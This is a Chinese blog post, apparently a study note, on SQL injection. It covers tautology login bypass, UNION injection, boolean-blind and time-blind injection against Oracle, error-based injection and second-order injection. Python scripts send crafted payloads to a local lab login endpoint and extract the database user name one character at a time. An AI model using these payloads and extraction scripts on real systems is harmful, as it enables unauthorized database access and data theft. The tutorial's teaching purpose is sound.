SQL注入漏洞

最新推荐文章于 2024-07-17 13:58:11 发布
最新推荐文章于 2024-07-17 13:58:11 发布
阅读量412 收藏 3
点赞数 5
文章标签: oracle 数据库 sql 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuyangzhengwei/article/details/139422203
版权

漏洞原理

SQL注入攻击主要是利用程序员在编写数据库查询语句时的疏忽,通过构造恶意的SQL语句,实现对数据库的非法访问和操作。攻击者可以在用户输入的数据中注入恶意的SQL代码,当这些数据被程序用来构建SQL查询语句并执行时恶意代码将被执行,从而绕过身份验证、读取敏感数据、篡改数据库内容等。

预防:过滤,校验前后端数据

流程

步骤

字符型

1.登录需要校验,没有用户和密码,但我们要实现登录。

2.利用sql漏洞,输入恶意sql语句,数据库除了输入用户名密码,还可以在后面输入一个条件,利用or 后面跟一个恒成立的条件。数据库默认在最前面和最后面加'。

where username='liuboss' or '1'=1'

数值型

where username= 1 or 1=1

联合注入

联合注入(有回显),UNION合并两个表格,连接两个sql语句。

123'or'1'='1 order by 2--查看列数通过列数排序

使用脚本

 for i in range(1,10):
    #构造的请求数据
     #data = {"userName":"zs' order by "+ str(i) +" --","password":"23"}
     #通过post方式 发送请求
    data = {"userName": "zs' order by " + str(i) + " --", "password": "23"}
     resp = requests.post('http://localhost:9191/login', data=data)
     print(resp.text)

123'or'1'='1 (union select user from dual)'1' --

select *from user_name where use_name = '123' 
union select(select user from dual)注入查询,'1',1,'1'匹配字段,'1'from dual
 data = {"userName": "zs' union all select user,'1',2,'3','4' from dual --", "password": "23"}
resp = requests.post('http://localhost:9191/login', data=data)
 print(resp.text)

布尔盲注(无回显)

猜长度

select *from user_name where use_name = '123' and length(user) = 7 --

截取字符换成字母

select *from user_name where use_name = '123' and substring(user,1,1) = 7

and sunstr(user,1,1) ='T'--

手动注入太慢采用脚本

使用--‘强行终止数据内容使后面语句失效

str(i)代表位置

 url = 'http://localhost:9191/login'
 num = 0;
 for i in range(2,10):
     data = {"userName":"zs' and length(user) = "+str(i)+" --","password":"23"}
     resp = requests.post(url,data=data)
     d = eval(resp.text)
     if d['mark'] == 'success':
         num = i
         break
 print(num)
 userName = ""
 strs = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
 for i in range(1,num+1):
     for c in strs:
         data = {"userName": "zs' and substr(user,"+str(i)+",1) = '" +c+ "' --", "password": "23"}
         resp = requests.post(url,data=data)
       d = eval(resp.text)
        if d['mark'] == 'success':
             userName = userName + c
             break
     time.sleep(2)
 print(userName)

eval将字符串转为字典

时间盲注

利用sql响应延迟来判断是否成功

import time
time.sleep
select * from user_info where user_name = 'zs'
union select '1','2',3,'4',(select case when
length(user) = 2 then '2' else to_char(dbms_pipe.receive_message('RDS', 2)) end  from dual
) from dual

报错注入

Select count(*),concat(PAYLOAD,floor(rand(0)*2))x from 表名 group by x;

二阶注入

原理:二阶注入就是无法直接注入,它是指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。

首先查看靶场中的用户列表,发现存在admin用户密码是admin

接下来注册一个新用户,admin'#,密码是123456,然后进入数据库查看是否注册成功

接下来登录我们新注册的账户,在这个页面可以进行修改密码,把新密码改成666666

神奇的事情发生了,数据库中admin'#的密码并没有被修改,但是admin的密码成功被修改

刘 boss
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
YXcms-含有SQL注入漏洞的源码包.zip
03-17
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者通过在输入字段中插入恶意SQL代码,以获取、修改、删除...
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
SQL注入漏洞过程实例及解决方案
09-08
SQL注入漏洞网络安全中的一个重要问题,它允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库查询,从而获取未经授权的数据或执行恶意操作。本文将深入探讨SQL注入漏洞的过程,并提供具体的解决方案。 首先...
基于爬虫的sql注入漏洞检测工具
05-16
本项目“基于爬虫的sql注入漏洞检测工具”旨在自动化检测这种漏洞,保护网站免受此类攻击。 首先,我们来深入理解SQL注入。当一个Web应用没有对用户输入进行充分的验证和清理,它可能会在构建动态SQL查询时直接使用...
利用SQL注入漏洞拖库的方法
09-11
SQL注入漏洞是一种常见的网络安全问题,主要出现在Web应用程序中,允许攻击者通过输入恶意的SQL语句来操纵数据库。本文将深入探讨如何利用SQL注入漏洞进行拖库操作,即获取数据库中的全部或部分数据。 首先,理解...
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
SQL注入漏洞全接触
03-03
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面...
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
CmsEasy crossall_act.php SQL注入漏洞.md
SQL注入漏洞全接触.rar
09-23
SQL注入漏洞网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞全接触"的压缩包中,我们很显然会深入探讨这个主题。让我们详细了解一下SQL注入及其相关的知识点。 SQL...
Oracle19.24发布,打补丁到19.24
最新发布
xiaofan23z的专栏
07-17 564
p6880880_190000_Linux-x86-64.zip (.43的opatch)(要求>=.42)p36582629_190000_Linux-x86-64.zip(GI)(rac需要,GI补丁包含DB)一般每个季度的首月中16号左右发布(北美时间),中国时间17号能看到。2024年7月16日 19c,19.24补丁发布。具体的patch number如下。基本和上面的步骤一致。
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 664
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
postgresql创建只读权限的用户
weixin_58494422的博客
07-12 1388
在PostgreSQL中,创建具有只读权限的用户是一个常见的安全需求,以确保某些用户只能查询数据库中的数据,而不能修改或删除数据。使用`psql`或其他数据库客户端登录到PostgreSQL数据库,使用具有足够权限的账户(如`postgres`),进入需要创建只读权限的数据库
在 PostgreSQL 里如何实现数据的冷热数据分层存储的自动化策略调整?
技术笔记
07-17 628
同样的道理,对于数据库中的数据,我们也可以根据其访问频率将其分为热数据和冷数据,并将它们存储在不同的存储介质上,以提高数据库的性能和存储效率。在这些数据中,有些是经常被访问的热点数据,而有些则是很少被访问的冷数据。首先,我们按照订单日期对订单表进行了分区,将最近一个月的订单数据存储在热数据分区中,将超过一个月的订单数据存储在冷数据分区中。然后,我们创建了一个触发器和一个存储过程,当订单数据被访问时,更新其最后访问时间,并每天晚上将超过一个月未被访问的订单数据从热数据分区迁移到冷数据分区。
数据库管理的艺术(MySQL):DDL、DML、DQL、DCL及TPL的实战应用(上:数据定义与控制)
weixin_68020300的博客
07-17 726
本文旨在为数据库管理员和开发者提供全面的MySQL基础知识,涵盖数据定义、数据操纵、数据查询、数据控制以及事务处理语言的精要。从创建数据库和表结构,到管理用户权限和事务的ACID特性,我们将一步步引导读者了解如何高效地利用SQL语言的各种功能,确保数据库安全性和数据的完整性。无论你是初学者还是有经验的DBA,本文都将是你不可或缺的参考资源。
Oracle字符集修改
余十步的博客
07-12 790
Oracle数据库默认的字符集编码为US7ASCII,这个编码是不支持中文的,如果想要在数据库存储中文,就需要修改编码为。执行此命令可能会报错:ORA-12712: 新字符集必须为旧字符集的超集。-- 关闭Oracle数据库的Advanced Queuing进程。-- 关闭Oracle数据库的Job Queue进程。-- 修改为ZHS16GBK/GB18030。-- 设置Oracle数据库为限制访问状态。修改字符集的前提是知道我们现在用的是什么字符集。7. 关闭数据库,重新启动。-- 修改为UTF-8。
SQL注入漏洞详解与实战教程
本资源是一份关于Web渗透测试入门的教程,重点讲解了SQL注入漏洞的相关知识。SQL注入漏洞是Web安全领域的一个严重威胁,它发生在黑客通过恶意构造SQL语句,利用应用程序处理用户输入时的不当过滤或转义,获取、修改...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值